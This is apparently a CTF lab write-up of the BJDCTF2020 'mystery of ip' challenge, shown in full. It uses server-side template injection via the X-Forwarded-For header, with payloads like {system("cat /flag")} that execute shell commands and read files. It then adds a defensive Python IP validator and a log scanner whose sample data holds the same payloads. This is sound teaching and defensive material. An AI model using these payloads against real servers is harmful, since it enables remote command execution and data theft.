[BJDCTF2020]The mystery of ip 1

Open the challenge instance. The page exposes the path flag.php, and visiting it displays your current internal (intranet) IP address.

Add an X-Forwarded-For (XFF) request header with HackBar and try spoofing the IP: the spoofed value is echoed back on the page.

This suggests the XFF header is an injection point. Several partial SQL injection payloads had no effect, so SQL injection was abandoned in favour of SSTI (server-side template injection):

X-Forwarded-For: {1+1}

The expression is evaluated and echoed back, confirming an SSTI vulnerability reachable through the XFF header.

Try constructing a payload:

X-Forwarded-For: {system("ls")}

The directory listing is returned successfully.

Check flag.php: no flag in it.

Check the root directory:

X-Forwarded-For: {system("ls / -a")}

The flag file is found there; the final payload is:

X-Forwarded-For: {system("cat /flag")}

flag{b0a840de-eeaf-4ed1-80c1-bb12ff2bcb10}
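The root cause in this challenge is that the X-Forwarded-For value is treated as template source instead of as data. As an added example (not part of the original writeup or the challenge code), the following Python shows the defensive side: a hardened way to derive a client IP from XFF that only accepts literal IP addresses, and a small log scanner that flags XFF values carrying brace-delimited template expressions like the ones used above. The log format, the sample lines and the single-brace delimiter assumption are constructed for this example.

```python
import ipaddress
import re

# Brace-delimited expression such as {1+1} or {system("ls")}.
# Assumption: the template engine uses single-brace delimiters, as the payloads above do.
TEMPLATE_EXPR = re.compile(r"\{[^{}]*\}")
# Identifier immediately followed by "(" inside an expression, e.g. system(
CALL_LIKE = re.compile(r"\b[A-Za-z_]\w*\s*\(")


def parse_xff(value):
    """Split an X-Forwarded-For header into its comma-separated entries."""
    return [part.strip() for part in value.split(",") if part.strip()]


def is_literal_ip(entry):
    """True only if the entry parses as an IPv4 or IPv6 address literal."""
    try:
        ipaddress.ip_address(entry)
        return True
    except ValueError:
        return False


def client_ip_from_xff(value, peer_addr):
    """Hardened replacement for echoing the raw header into a template:
    use the first XFF entry only if it is a literal IP, otherwise fall
    back to the socket peer address. Non-IP input never reaches the page."""
    entries = parse_xff(value)
    if entries and is_literal_ip(entries[0]):
        return entries[0]
    return peer_addr


def classify_xff(value):
    """Verdict for one header value:
    'ip'            every entry is a literal IP address
    'template-call' brace expression containing a function-style call
    'template-expr' brace expression without a call (e.g. {1+1})
    'malformed'     anything else that is not an IP"""
    entries = parse_xff(value)
    if entries and all(is_literal_ip(e) for e in entries):
        return "ip"
    for m in TEMPLATE_EXPR.finditer(value):
        if CALL_LIKE.search(m.group(0)):
            return "template-call"
    if TEMPLATE_EXPR.search(value):
        return "template-expr"
    return "malformed"


# Constructed sample access-log lines (not from the page):
# peer address, request line, then the XFF header value (inner quotes escaped).
SAMPLE_LOG = [
    '10.0.0.7 "GET /flag.php" xff="10.0.0.7"',
    '10.0.0.7 "GET /flag.php" xff="127.0.0.1"',
    '10.0.0.7 "GET /flag.php" xff="{1+1}"',
    '10.0.0.7 "GET /flag.php" xff="{system(\\"ls\\")}"',
    '10.0.0.7 "GET /flag.php" xff="not-an-ip"',
]
LOG_RE = re.compile(r'^(\S+) "(.*?)" xff="(.*)"$')


def scan_log(lines):
    """Return (peer, request, xff, verdict) for every line whose XFF value
    is not a clean list of IP addresses; template-call entries are the ones
    matching the injection pattern shown in the writeup."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        peer, request, xff = m.groups()
        xff = xff.replace('\\"', '"')  # undo the log's quote escaping
        verdict = classify_xff(xff)
        if verdict != "ip":
            findings.append((peer, request, xff, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The validation function is the actual fix: a page that only ever displays what `client_ip_from_xff` returns cannot be driven by template syntax, because anything that is not an IP literal is discarded before rendering. The scanner is the detection side, useful for spotting probe values such as `{1+1}` in historical access logs even when they caused no visible damage.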
posted @ TazmiDev